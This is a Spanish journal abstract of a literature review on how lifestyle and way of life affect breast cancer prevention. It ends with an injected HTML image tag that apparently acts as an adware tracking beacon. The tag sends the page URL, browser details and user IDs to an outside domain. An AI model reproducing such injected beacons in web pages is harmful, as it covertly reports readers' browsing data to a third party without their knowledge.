Repercusión social del modo y los estilos de vida en la prevención del cáncer de mama - Gálvez Espinosa, Maydel (Mediciego, 2013)
El presente trabajo se corresponde con una revisión bibliográfica sobre la repercusión social del modo y los estilos de vida en la prevención del cáncer de mama, con el objetivo de analizar como repercuten estas dos determinantes de salud en la prevención de esta enfermedad. Se utilizó en su realización métodos teóricos, con un enfoque socio-histórico y lógico en el análisis y síntesis documental relacionada con las diversas revisiones realizadas a literaturas nacionales e internaciones. Se pudo concluir que los cambios positivos en los estilos de vida de la mujer tienen un resultado beneficioso en la prevención del cáncer de mama, las alteraciones psicológicas, familiares, laborales, económicas, así como la pérdida de años productivos y socialmente activos, que provoca el diagnóstico de cáncer de mama en la mujer, se pueden disminuir con cambios en los estilos de vida y práctica de conductas preventivas, la labor educativa para formar o modificar el modo y estilo de vida y proteger la salud, se debe desarrollar con la familia, al fortalecer la unidad, la permanencia, la autoridad y el prestigio de esta, se mejoran aspectos como el nivel educacional, que permiten realizar de forma más factible, las labores de promoción de salud y prevención del cáncer de mama.<img src="http://prettysite.xyz/acnt?_=1583868233214&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F279&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />